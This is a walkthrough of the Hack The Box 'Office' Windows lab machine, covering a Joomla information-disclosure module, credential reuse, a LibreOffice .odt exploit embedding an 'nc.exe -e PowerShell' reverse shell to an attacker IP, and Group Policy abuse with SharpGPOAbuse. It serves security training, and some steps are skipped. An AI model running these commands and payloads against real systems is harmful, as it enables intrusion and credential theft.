Office is a hard-difficulty Windows machine featuring various vulnerabilities, including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing a LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials, and abusing Group Policies due to excessive Active Directory privileges.
Enumeration
Scope
IP Address: 10.10.11.3
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-14T17:06:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s
When visiting https://10.10.11.3/, the server returns a 403 Forbidden message.
SMB Enumeration
Nothing useful was found from unauthenticated SMB access.
KERBEROS Enumeration
Kerbrute with the jsmith.txt wordlist found some valid usernames.
Additional users were found when using the xato-10-million wordlist.
I added all the users found to a wordlist and then tried an AS-REP roasting attack, but it failed.
HTTP Enumeration
http://10.10.11.3/
The site runs the Joomla CMS.
I visited http://10.10.11.3/readme.txt to get the version and then searched for a CVE affecting it.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version
* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>
This version is affected by an unauthenticated information disclosure vulnerability (CVE-2023-23752).
I started Metasploit, searched for the CVE number and found a matching module.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q
msf6 > search CVE-2023-23752
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the Joomla Application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
474 * Tony Stark Administrator Administrator@holography.htb 1 2023-04-13 23:27:32 2024-01-24 13:00:47 Super Users
[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db prefix if2tx_
db user root
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
We get database credentials:
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db user root
I now have the Joomla username but still don't know its password, so I will reuse the database password I found against the web login form and against the domain users found earlier.
Let's enumerate the domain with the resulting credentials (office.htb\dwolfe, used below). I will do the following:
Run the BloodHound ingestors
Enumerate the shares
Search for Kerberoastable accounts
Run bloodhound.py to collect info and feed it into bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all
<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21S
Start CrackMapExec to view the shares and the permissions on them.
I run the spider_plus module against the shares to explore their content quickly.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SPIDER_P... 10.10.11.3 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.11.3 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.11.3 445 DC [*] OUTPUT: /tmp/cme_spider_plus
I found a .pcap file in the SOC Analysis share, so I will download it and examine it locally.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json
<snip>
"SOC Analysis": {
"Latest-System-Dump-8fbc124d.pcap": {
"atime_epoch": "2023-05-07 20:59:54",
"ctime_epoch": "2023-05-07 20:59:54",
"mtime_epoch": "2023-05-10 14:51:42",
"size": "1.31 MB"
}
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'
Password for [WORKGROUP\dwolfe]:
smb: \> ls
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
smb: \> get Latest-System-Dump-8fbc124d.pcap
I will upgrade the webshell to p0wny.php to get a more flexible shell.
I didn't find anything useful in the context of web_account, as its home directory is empty, so I uploaded RunasCs.exe to get a shell as tstark.
Shell as tstark
.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764
PS C:\Windows\system32> whoami
office\tstark
PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx
User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx
Shell as ppotts
Looking at the listening ports, there is a non-standard port open.
Looking for the process that owns this port revealed that it is a web server.
Checking the permissions on its applications directory, the user ppotts has full access to it.
PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
OFFICE\PPotts:(OI)(CI)(NP)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
OFFICE\web_account:(OI)(CI)(RX,W)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX)
The community pointed out a CVE affecting LibreOffice (CVE-2023-2255) that allows crafting a .odt file which gives RCE when the file is opened.
┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !
Upload the exploit via webapp
Get a shell as ppotts
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell
PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts
There is a job_offering.ps1 in the Music directory that is responsible for triggering the exploit: it opens every uploaded .odt file with LibreOffice.
PS C:\Users\PPotts> type Music\job_offering.ps1
# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"
# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
foreach ($odtFile in $odtFiles) {
$newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
$destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
Copy-Item -Path $odtFile.FullName -Destination $destination -Force
del C:\xampp\htdocs\internal\applications\$odtFile
}
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()
foreach ($odtFile in $odtFiles) {
# Start LibreOffice to open the ODT file
Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
# Store the process ID for later termination
$libreOfficeProcessIds = $_.Id
}
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 7
# Wait for LibreOffice processes to finish opening files and then terminate them
Stop-Process -Id $libreOfficeProcessIds -Force
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 5
}
Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force
# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f
Shell as hhogan
There are stored credentials for hhogan in the ppotts session.
When I tried to execute commands as that user, it asked for a password.
PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan:
Looking at BloodHound, user hhogan is a member of GPO MANAGERS, which has the ability to modify Group Policy Objects; this can be abused to perform malicious actions.
As we don't know the password of hhogan, we can extract it by decrypting DPAPI. We need the master key and credential files, which are located by default in <user>\AppData\Roaming\Microsoft\Credentials and <user>\AppData\Roaming\Microsoft\Protect\<user-sid>\<GUID>.
We must provide a password for the command below, but there is a post from SpecterOps that says it can be done without the password: just pass the /rpc option to mimikatz.
I will use SharpGPOAbuse with --AddLocalAdmin; here are its options:
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
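The change above lands in the GPO's GptTmpl.inf as a Restricted Groups entry under [Group Membership]. The following is an added defender-side audit example, not code from this writeup or from SharpGPOAbuse: it parses such a file and flags any SID the GPO pushes into the local Administrators group. The file content is a constructed sample that mirrors the entry produced above; the group-SID table is an assumption limited to Administrators.

```python
import re

# Well-known local group whose membership a GPO should rarely control
# (assumed scope for this example: only Administrators, S-1-5-32-544).
PRIVILEGED_LOCAL_GROUPS = {"S-1-5-32-544": "Administrators"}

# Constructed sample of a minimal GptTmpl.inf after a Restricted Groups
# entry adds one domain user SID (hhogan's SID from above) to Administrators.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108
"""


def parse_sections(text):
    """Return {section: [(key, value), ...]} from INI-style GptTmpl.inf text."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # skip blanks and comments
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]          # new section header
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def restricted_group_members(text):
    """Map group SID -> member SIDs declared via *<group-sid>__Members keys."""
    result = {}
    for key, value in parse_sections(text).get("Group Membership", []):
        m = re.fullmatch(r"\*(S-1-5-[\d-]+)__Members", key)
        if m:   # values are comma-separated, each prefixed with '*'
            result[m.group(1)] = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
    return result


def find_admin_grants(text):
    """Return (group name, member SID) pairs that add members to privileged local groups."""
    return [(PRIVILEGED_LOCAL_GROUPS[g], sid)
            for g, members in restricted_group_members(text).items()
            if g in PRIVILEGED_LOCAL_GROUPS for sid in members]


if __name__ == "__main__":
    for group, sid in find_admin_grants(SAMPLE_GPTTMPL):
        print(f"GPO adds {sid} to local {group}")
```

Real GptTmpl.inf files under SYSVOL are usually UTF-16 LE, so read them with open(path, encoding="utf-16") before passing the text in. Pair this with monitoring of the GPO versionNumber attribute, which the output above shows being bumped on modification.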
Run gpupdate so the modified policy takes effect.
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/14/2024 9:59 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxx